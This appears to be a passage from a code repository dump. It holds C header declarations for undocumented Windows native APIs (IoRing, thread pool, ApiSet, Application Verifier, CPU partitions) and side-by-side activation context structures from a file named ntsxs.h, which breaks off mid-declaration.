PULONG Response);\n\n/************************************************************************************\n*\n* IoRing API.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateIoRing(\n _Out_ PHANDLE IoRingHandle,\n _In_ ULONG CreateParametersLength,\n _In_ PVOID CreateParameters,\n _In_ ULONG OutputParametersLength,\n _Out_ PVOID OutputParameters);\n\n/************************************************************************************\n*\n* Thread Pooling API and definitions.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nTpAllocPool(\n _Out_ PTP_POOL* PoolReturn,\n _Reserved_ PVOID Reserved);\n\nNTSYSAPI\nVOID\nNTAPI\nTpReleasePool(\n _Inout_ PTP_POOL Pool);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nTpAllocWork(\n _Out_ PTP_WORK* WorkReturn,\n _In_ PTP_WORK_CALLBACK Callback,\n _Inout_opt_ PVOID Context,\n _In_opt_ PTP_CALLBACK_ENVIRON CallbackEnviron);\n\nNTSYSAPI\nVOID\nNTAPI\nTpReleaseWork(\n _Inout_ PTP_WORK Work);\n\nNTSYSAPI\nVOID\nNTAPI\nTpPostWork(\n _Inout_ PTP_WORK Work);\n\nNTSYSAPI\nVOID\nNTAPI\nTpWaitForWork(\n _Inout_ PTP_WORK Work,\n _In_ LOGICAL CancelPendingCallbacks);\n\n/************************************************************************************\n*\n* ApiSet definitions.\n*\n************************************************************************************/\n\nNTSYSAPI\nBOOL\nNTAPI\nApiSetQueryApiSetPresence(\n _In_ PCUNICODE_STRING Namespace,\n _Out_ PBOOLEAN Present);\n\nNTSYSAPI\nBOOL\nNTAPI\nApiSetQueryApiSetPresenceEx(\n _In_ PCUNICODE_STRING Namespace,\n _Out_ PBOOLEAN IsInSchema,\n _Out_ PBOOLEAN Present);\n\n/************************************************************************************\n*\n* Application Verifier API and definitions.\n*\n************************************************************************************/\n\n#ifndef DLL_PROCESS_VERIFIER\n#define DLL_PROCESS_VERIFIER 4\n#endif\n\ntypedef VOID(NTAPI *RTL_VERIFIER_DLL_LOAD_CALLBACK)(\n PWSTR DllName,\n PVOID DllBase,\n SIZE_T DllSize,\n PVOID Reserved);\n\ntypedef VOID(NTAPI *RTL_VERIFIER_DLL_UNLOAD_CALLBACK)(\n PWSTR DllName,\n PVOID DllBase,\n SIZE_T DllSize,\n PVOID Reserved);\n\ntypedef VOID(NTAPI *RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK)(\n PVOID AllocationBase,\n SIZE_T AllocationSize);\n\ntypedef struct _RTL_VERIFIER_THUNK_DESCRIPTOR {\n PCHAR ThunkName;\n PVOID ThunkOldAddress;\n PVOID ThunkNewAddress;\n} RTL_VERIFIER_THUNK_DESCRIPTOR, *PRTL_VERIFIER_THUNK_DESCRIPTOR;\n\ntypedef struct _RTL_VERIFIER_DLL_DESCRIPTOR {\n PWCHAR DllName;\n DWORD DllFlags;\n PVOID DllAddress;\n PRTL_VERIFIER_THUNK_DESCRIPTOR DllThunks;\n} RTL_VERIFIER_DLL_DESCRIPTOR, *PRTL_VERIFIER_DLL_DESCRIPTOR;\n\ntypedef struct _RTL_VERIFIER_PROVIDER_DESCRIPTOR {\n DWORD Length;\n PRTL_VERIFIER_DLL_DESCRIPTOR ProviderDlls;\n RTL_VERIFIER_DLL_LOAD_CALLBACK ProviderDllLoadCallback;\n RTL_VERIFIER_DLL_UNLOAD_CALLBACK ProviderDllUnloadCallback;\n PWSTR VerifierImage;\n DWORD VerifierFlags;\n DWORD VerifierDebug;\n PVOID RtlpGetStackTraceAddress;\n PVOID RtlpDebugPageHeapCreate;\n PVOID RtlpDebugPageHeapDestroy;\n RTL_VERIFIER_NTDLLHEAPFREE_CALLBACK ProviderNtdllHeapFreeCallback;\n} RTL_VERIFIER_PROVIDER_DESCRIPTOR, *PRTL_VERIFIER_PROVIDER_DESCRIPTOR;\n\n//\n// Application verifier standard flags.\n//\n#define RTL_VRF_FLG_FULL_PAGE_HEAP 0x00000001\n#define RTL_VRF_FLG_RESERVED_DONOTUSE 0x00000002\n#define RTL_VRF_FLG_HANDLE_CHECKS 0x00000004\n#define RTL_VRF_FLG_STACK_CHECKS 0x00000008\n#define RTL_VRF_FLG_APPCOMPAT_CHECKS 0x00000010\n#define RTL_VRF_FLG_TLS_CHECKS 0x00000020\n#define RTL_VRF_FLG_DIRTY_STACKS 0x00000040\n#define RTL_VRF_FLG_RPC_CHECKS 0x00000080\n#define RTL_VRF_FLG_COM_CHECKS 0x00000100\n#define RTL_VRF_FLG_DANGEROUS_APIS 0x00000200\n#define RTL_VRF_FLG_RACE_CHECKS 0x00000400\n#define RTL_VRF_FLG_DEADLOCK_CHECKS 0x00000800\n#define RTL_VRF_FLG_FIRST_CHANCE_EXCEPTION_CHECKS 0x00001000\n#define RTL_VRF_FLG_VIRTUAL_MEM_CHECKS 0x00002000\n#define RTL_VRF_FLG_ENABLE_LOGGING 0x00004000\n#define RTL_VRF_FLG_FAST_FILL_HEAP 0x00008000\n#define RTL_VRF_FLG_VIRTUAL_SPACE_TRACKING 0x00010000\n#define RTL_VRF_FLG_ENABLED_SYSTEM_WIDE 0x00020000\n#define RTL_VRF_FLG_MISCELLANEOUS_CHECKS 0x00020000\n#define RTL_VRF_FLG_LOCK_CHECKS 0x00040000\n\nNTSYSAPI\nVOID\nNTAPI\nRtlApplicationVerifierStop(\n _In_ ULONG_PTR Code,\n _In_ PSTR Message,\n _In_ ULONG_PTR Param1,\n _In_ PSTR Description1,\n _In_ ULONG_PTR Param2,\n _In_ PSTR Description2,\n _In_ ULONG_PTR Param3,\n _In_ PSTR Description3,\n _In_ ULONG_PTR Param4,\n _In_ PSTR Description4);\n\n#ifndef VERIFIER_STOP\n#define VERIFIER_STOP(Code, Msg, P1, S1, P2, S2, P3, S3, P4, S4) { \\\n RtlApplicationVerifierStop ((Code), \\\n (Msg), \\\n (ULONG_PTR)(P1),(S1), \\\n (ULONG_PTR)(P2),(S2), \\\n (ULONG_PTR)(P3),(S3), \\\n (ULONG_PTR)(P4),(S4)); \\\n }\n#endif\n\n/************************************************************************************\n*\n* CPU partition API & definitions.\n*\n************************************************************************************/\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtOpenCpuPartition(\n _Out_ PHANDLE CpuPartitionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtCreateCpuPartition(\n _Out_ PHANDLE CpuPartitionHandle,\n _In_ ACCESS_MASK DesiredAccess,\n _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtSetInformationCpuPartition(\n _In_ HANDLE CpuPartitionHandle,\n _In_ ULONG CpuPartitionInformationClass,\n _In_reads_bytes_(CpuPartitionInformationLength) PVOID CpuPartitionInformation,\n _In_ ULONG CpuPartitionInformationLength,\n _Reserved_ PVOID Reserved0,\n _Reserved_ ULONG Reserved1,\n _Reserved_ ULONG Reserved2);\n\nNTSYSAPI\nNTSTATUS\nNTAPI\nNtQueryInformationCpuPartition(\n _In_ HANDLE CpuPartitionHandle,\n _In_ ULONG CpuPartitionInformationClass,\n _Out_writes_bytes_opt_(CpuPartitionInformationLength) PVOID CpuPartitionInformation,\n _In_ ULONG CpuPartitionInformationLength,\n _Out_opt_ PULONG ReturnLength);\n\n//\n// NTOS_RTL HEADER END\n//\n\n#ifdef __cplusplus\n}\n#endif\n\n#pragma warning(pop)\n\n#endif NTOS_RTL\n"
},
{
"path": "Source/Shared/ntos/ntsxs.h",
"content": "/************************************************************************************\n*\n* (C) COPYRIGHT AUTHORS, 2017 - 2023, translated from Microsoft sources/debugger\n*\n* TITLE: NTSXS.H\n*\n* VERSION: 1.05\n*\n* DATE: 24 Jun 2023\n*\n* Common header file for the SxS related API functions and definitions.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n************************************************************************************/\n\n#ifndef NTSXS_RTL\n#define NTSXS_RTL\n\n//\n// NTSXS_RTL HEADER BEGIN\n//\n\n#if defined(__cplusplus)\nextern \"C\" {\n#endif\n\n#pragma warning(push)\n#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int\n\n#define ACTCTX_PROCESS_DEFAULT ((void*)NULL)\n#define ACTCTX_EMPTY ((void*)(LONG_PTR)-3)\n#define ACTCTX_SYSTEM_DEFAULT ((void*)(LONG_PTR)-4)\n#define IS_SPECIAL_ACTCTX(x) (((((LONG_PTR)(x)) - 1) | 7) == -1)\n\ntypedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;\ntypedef const struct _ACTIVATION_CONTEXT *PCACTIVATION_CONTEXT;\n\n#define INVALID_ACTIVATION_CONTEXT ((PACTIVATION_CONTEXT) ((LONG_PTR) -1))\n\n#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_USE_ACTIVE_ACTIVATION_CONTEXT (0x00000001)\n#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_ACTIVATION_CONTEXT_IS_MODULE (0x00000002)\n#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_ACTIVATION_CONTEXT_IS_ADDRESS (0x00000004)\n#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_NO_ADDREF (0x80000000)\n\n#define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_ACTIVATION_CONTEXT (0x00000001)\n#define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_FLAGS (0x00000002)\n#define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_ASSEMBLY_METADATA (0x00000004)\n\n#define ACTIVATION_CONTEXT_SECTION_FORMAT_UNKNOWN 0\n#define ACTIVATION_CONTEXT_SECTION_FORMAT_STRING 1\n#define ACTIVATION_CONTEXT_SECTION_FORMAT_GUID 2\n\n#define ACTIVATION_CONTEXT_DATA_MAGIC 0x78746341 //'xtcA'\n#define ACTIVATION_CONTEXT_STRING_SECTION_MAGIC 0x64487353 //'dHsS'\n#define ACTIVATION_CONTEXT_GUID_SECTION_MAGIC 0x64487347 //'dHsG'\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_TOC_HEADER {\n ULONG HeaderSize;\n ULONG EntryCount;\n ULONG FirstEntryOffset;\n ULONG Flags;\n} ACTIVATION_CONTEXT_DATA_TOC_HEADER, *PACTIVATION_CONTEXT_DATA_TOC_HEADER;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER {\n ULONG HeaderSize;\n ULONG EntryCount;\n ULONG FirstEntryOffset;\n ULONG Flags;\n} ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER, *PACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_TOC_ENTRY {\n ULONG Id; //type of section\n ULONG Offset;\n ULONG Length;\n ULONG Format; //ACTIVATION_CONTEXT_SECTION_FORMAT_*\n} ACTIVATION_CONTEXT_DATA_TOC_ENTRY, *PACTIVATION_CONTEXT_DATA_TOC_ENTRY;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY {\n GUID ExtensionGuid;\n ULONG Offset;\n ULONG Length;\n} ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY, *PACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY;\n\ntypedef struct _ACTIVATION_CONTEXT_STRING_SECTION_HEADER {\n ULONG Magic;\n ULONG HeaderSize;\n ULONG FormatVersion;\n ULONG DataFormatVersion;\n ULONG Flags;\n ULONG ElementCount;\n ULONG ElementListOffset;\n ULONG HashAlgorithm;\n ULONG SearchStructureOffset;\n ULONG UserDataOffset;\n ULONG UserDataSize;\n} ACTIVATION_CONTEXT_STRING_SECTION_HEADER, *PACTIVATION_CONTEXT_STRING_SECTION_HEADER;\n\n#define ACTIVATION_CONTEXT_STRING_SECTION_CASE_INSENSITIVE (0x00000001)\n#define ACTIVATION_CONTEXT_STRING_SECTION_ENTRIES_IN_PSEUDOKEY_ORDER (0x00000002)\n\ntypedef struct _ACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE {\n ULONG BucketTableEntryCount;\n ULONG BucketTableOffset;\n} ACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE, *PACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE;\n\ntypedef struct _ACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET {\n ULONG ChainCount;\n ULONG ChainOffset;\n} ACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET, *PACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET;\n\ntypedef struct _ACTIVATION_CONTEXT_STRING_SECTION_ENTRY {\n ULONG PseudoKey;\n ULONG KeyOffset;\n ULONG KeyLength;\n ULONG Offset;\n ULONG Length;\n ULONG AssemblyRosterIndex;\n} ACTIVATION_CONTEXT_STRING_SECTION_ENTRY, *PACTIVATION_CONTEXT_STRING_SECTION_ENTRY;\n\ntypedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HEADER {\n ULONG Magic;\n ULONG HeaderSize;\n ULONG FormatVersion;\n ULONG DataFormatVersion;\n ULONG Flags;\n ULONG ElementCount;\n ULONG ElementListOffset;\n ULONG HashAlgorithm;\n ULONG SearchStructureOffset;\n ULONG UserDataOffset;\n ULONG UserDataSize;\n} ACTIVATION_CONTEXT_GUID_SECTION_HEADER, PACTIVATION_CONTEXT_GUID_SECTION_HEADER;\n\ntypedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE {\n ULONG BucketTableEntryCount;\n ULONG BucketTableOffset;\n} ACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE, *PACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE;\n\ntypedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET {\n ULONG ChainCount;\n ULONG ChainOffset;\n} ACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET, *PACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET;\n\ntypedef struct _ACTIVATION_CONTEXT_GUID_SECTION_ENTRY {\n GUID Guid;\n ULONG Offset;\n ULONG Length;\n ULONG AssemblyRosterIndex;\n} ACTIVATION_CONTEXT_GUID_SECTION_ENTRY, *PACTIVATION_CONTEXT_GUID_SECTION_ENTRY;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION {\n ULONG Size;\n ULONG Flags;\n GUID PolicyCoherencyGuid;\n GUID PolicyOverrideGuid;\n ULONG ApplicationDirectoryPathType;\n ULONG ApplicationDirectoryLength;\n ULONG ApplicationDirectoryOffset;\n ULONG ResourceName;\n} ACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION;\n\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ROOT_ASSEMBLY (0x00000001)\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_POLICY_APPLIED (0x00000002)\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ASSEMBLY_POLICY_APPLIED (0x00000004)\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ROOT_POLICY_APPLIED (0x00000008)\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_PRIVATE_ASSEMBLY (0x00000010)\n\n#pragma pack(push,1)\ntypedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION {\n ULONG Size;\n ULONG Flags;\n ULONG EncodedAssemblyIdentityLength;\n ULONG EncodedAssemblyIdentityOffset;\n ULONG ManifestPathType;\n ULONG ManifestPathLength;\n ULONG ManifestPathOffset;\n LARGE_INTEGER ManifestLastWriteTime;\n ULONG PolicyPathType;\n ULONG PolicyPathLength;\n ULONG PolicyPathOffset;\n LARGE_INTEGER PolicyLastWriteTime;\n ULONG MetadataSatelliteRosterIndex;\n ULONG Unused2;\n ULONG ManifestVersionMajor;\n ULONG ManifestVersionMinor;\n ULONG PolicyVersionMajor;\n ULONG PolicyVersionMinor;\n ULONG AssemblyDirectoryNameLength;\n ULONG AssemblyDirectoryNameOffset;\n ULONG NumOfFilesInAssembly;\n ULONG LanguageLength;\n ULONG LanguageOffset;\n ACTCTX_REQUESTED_RUN_LEVEL RunLevel;\n ULONG UiAccess;\n} ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION;\n#pragma pack(pop)\n\n#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_INCLUDES_BASE_NAME (0x00000001)\n#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_OMITS_ASSEMBLY_ROOT (0x00000002)\n#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_EXPAND (0x00000004)\n#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SYSTEM_DEFAULT_REDIRECTED_SYSTEM32_DLL (0x00000008)\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION {\n ULONG Size;\n ULONG Flags;\n ULONG TotalPathLength;\n ULONG PathSegmentCount;\n ULONG PathSegmentOffset;\n} ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION, *PACTIVATION_CONTEXT_DATA_DLL_REDIRECTION;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT {\n ULONG Length;\n ULONG Offset;\n} ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT, *PACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION {\n ULONG Size;\n ULONG Flags;\n ULONG VersionSpecificClassNameLength;\n ULONG VersionSpecificClassNameOffset;\n ULONG DllNameLength;\n ULONG DllNameOffset;\n} ACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION, *PACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION;\n\n#define ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS_FORMAT_LONGHORN (1)\n\n#define SXS_WINDOWS_SETTINGS_NAMESPACE L\"http://schemas.microsoft.com/SMI/2005/WindowsSettings\"\n#define SXS_WINDOWS_SETTINGS_NAMESPACE_CCH (53)\n\n#define SXS_WINDOWS_SETTINGS_2011_NAMESPACE L\"http://schemas.microsoft.com/SMI/2011/WindowsSettings\"\n#define SXS_WINDOWS_SETTINGS_2011_NAMESPACE_CCH (53)\n\n#define SXS_WINDOWS_SETTINGS_2013_NAMESPACE L\"http://schemas.microsoft.com/SMI/2013/WindowsSettings\"\n#define SXS_WINDOWS_SETTINGS_2013_NAMESPACE_CCH (53)\n\n#define SXS_WINDOWS_SETTINGS_2014_NAMESPACE L\"http://schemas.microsoft.com/SMI/2014/WindowsSettings\"\n#define SXS_WINDOWS_SETTINGS_2014_NAMESPACE_CCH (53)\n\n#define SXS_WINDOWS_SETTINGS_2016_NAMESPACE L\"http://schemas.microsoft.com/SMI/2016/WindowsSettings\"\n#define SXS_WINDOWS_SETTINGS_2016_NAMESPACE_CCH (53)\n\n#define SXS_WINDOWS_SETTINGS_2017_NAMESPACE L\"http://schemas.microsoft.com/SMI/2017/WindowsSettings\"\n#define SXS_WINDOWS_SETTINGS_2017_NAMESPACE_CCH (53)\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS {\n ULONG Size;\n ULONG Flags;\n ULONG SettingNamespaceLength;\n ULONG SettingNamespaceOffset;\n ULONG SettingNameLength;\n ULONG SettingNameOffset;\n ULONG SettingValueLength;\n ULONG SettingValueOffset;\n} ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS, *PACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS;\n\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_FORMAT_WHISTLER (1)\n\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_INVALID (0)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_APARTMENT (1)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_FREE (2)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_SINGLE (3)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_BOTH (4)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_NEUTRAL (5)\n\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET (8)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_DEFAULT (0x01 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_ICON (0x02 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_CONTENT (0x04 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_THUMBNAIL (0x08 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_DOCPRINT (0x10 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION {\n ULONG Size;\n ULONG Flags;\n ULONG ThreadingModel;\n GUID ReferenceClsid;\n GUID ConfiguredClsid;\n GUID ImplementedClsid;\n GUID TypeLibraryId;\n ULONG ModuleLength;\n ULONG ModuleOffset;\n ULONG ProgIdLength;\n ULONG ProgIdOffset;\n ULONG ShimDataLength;\n ULONG ShimDataOffset;\n ULONG MiscStatusDefault;\n ULONG MiscStatusContent;\n ULONG MiscStatusThumbnail;\n ULONG MiscStatusIcon;\n ULONG MiscStatusDocPrint;\n} ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION;\n\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM_TYPE_OTHER (1)\n#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM_TYPE_CLR_CLASS (2)\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM {\n ULONG Size;\n ULONG Flags;\n ULONG Type;\n ULONG ModuleLength;\n ULONG ModuleOffset;\n ULONG TypeLength;\n ULONG TypeOffset;\n ULONG ShimVersionLength;\n ULONG ShimVersionOffset;\n ULONG DataLength;\n ULONG DataOffset;\n} ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM, *PACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION {\n ULONG Size;\n ULONG Flags;\n ULONG NameLength;\n ULONG NameOffset;\n USHORT ResourceId;\n USHORT LibraryFlags;\n ULONG HelpDirLength;\n ULONG HelpDirOffset;\n} ACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION {\n ULONG Size;\n ULONG Flags;\n ULONG ConfiguredClsidOffset;\n} ACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION;\n\ntypedef struct _SXS_OVERRIDE_MANIFEST {\n PCWSTR Name;\n PVOID Address;\n SIZE_T Size;\n} SXS_OVERRIDE_MANIFEST, *PSXS_OVERRIDE_MANIFEST;\n\ntypedef struct _SXS_MANIFEST_STREAM {\n const IID* IIDStream;\n PVOID OutIStream;\n}SXS_MANIFEST_STREAM, *PSXS_MANIFEST_STREAM;\n\ntypedef struct _ACTIVATION_CONTEXT_ASSEMBLY_DATA {\n ULONG Size;\n ULONG Flags;\n WCHAR *AssemblyName;\n ULONG AssemblyNameLength;\n ULONG HashAlgorithm;\n ULONG PseudoKey;\n} ACTIVATION_CONTEXT_ASSEMBLY_DATA, *PACTIVATION_CONTEXT_ASSEMBLY_DATA;\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER {\n ULONG HeaderSize;\n ULONG HashAlgorithm;\n ULONG EntryCount;\n ULONG FirstEntryOffset;\n ULONG AssemblyInformationSectionOffset;\n} ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER;\n\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY_INVALID (0x00000001)\n#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY_ROOT (0x00000002)\n\ntypedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY {\n ULONG Flags;\n ULONG PseudoKey;\n ULONG AssemblyNameOffset;\n ULONG AssemblyNameLength;\n ULONG AssemblyInformationOffset;\n ULONG AssemblyInformationLength;\n} ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY;\n\ntypedef struct _ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA {\n PVOID Information;\n PVOID SectionBase;\n ULONG SectionLength;\n PVOID SectionGlobalDataBase;\n ULONG SectionGlobalDataLength;\n} ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA, *PACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA;\n\ntypedef struct _ACTIVATION_CONTEXT_SECTION_KEYED_DATA {\n ULONG Size;\n ULONG DataFormatVersion;\n PVOID Data;\n ULONG Length;\n PVOID SectionGlobalData;\n ULONG SectionGlobalDataLength;\n PVOID SectionBase;\n ULONG SectionTotalLength;\n PACTIVATION_CONTEXT ActivationContext;\n ULONG AssemblyRosterIndex;\n ULONG Flags;\n ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA AssemblyMetadata;\n} ACTIVATION_CONTEXT_SECTION_KEYED_DATA, *PACTIVATION_CONTEXT_SECTION_KEYED_DATA;\n\n#define RTL_ACTIVATE_ACTIVATION_CONTEXT_EX_FLAG_RELEASE_ON_STACK_DEALLOCATION (0x00000001)\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlActivateActivationContextEx(\n _In_ ULONG Flags,\n _In_ PTEB Teb,\n _In_ PACTIVATION_CONTEXT ActivationContext,\n _Out_ PULONG_PTR Cookie);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlQueryInformationActivationContext(\n _In_ ULONG Flags,\n _In_ PCACTIVATION_CONTEXT ActivationContext,\n _In_opt_ PVOID SubInstanceIndex,\n _In_ ACTIVATION_CONTEXT_INFO_CLASS ActivationContextInformationClass,\n _Out_ PVOID ActivationContextInformation,\n _In_ SIZE_T ActivationContextInformationLength,\n _Out_opt_ PSIZE_T ReturnLength);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlQueryInformationActiveActivationContext(\n _In_ ACTIVATION_CONTEXT_INFO_CLASS ActivationContextInformationClass,\n _Out_ PVOID ActivationContextInformation,\n _In_ SIZE_T ActivationContextInformationLength,\n _Out_opt_ PSIZE_T ReturnLength);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlAllocateActivationContextStack(\n _Inout_ PACTIVATION_CONTEXT_STACK *ActivationContextStackPointer);\n\nNTSYSAPI\nVOID \nNTAPI \nRtlFreeActivationContextStack(\n _In_ PACTIVATION_CONTEXT_STACK ActivationContextStackPointer);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlCreateActivationContext(\n _In_ ULONG Flags,\n _In_ const PACTIVATION_CONTEXT_DATA ActivationContextData,\n _In_opt_ ULONG ExtraBytes,\n _In_opt_ PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine,\n _In_opt_ PVOID NotificationContext,\n _Out_ PACTIVATION_CONTEXT *ActivationContext);\n\nNTSYSAPI\nVOID \nNTAPI \nRtlAddRefActivationContext(\n _In_ PACTIVATION_CONTEXT AppCtx);\n\nNTSYSAPI\nVOID \nNTAPI \nRtlReleaseActivationContext(\n _In_ PACTIVATION_CONTEXT AppCtx);\n\nNTSYSAPI\nNTSTATUS \nNTAPI \nRtlZombifyActivationContext(\n _In_ PACTIVATION_CONTEXT ActivationContext);\n\nNTSYSAPI\nNTSTATUS 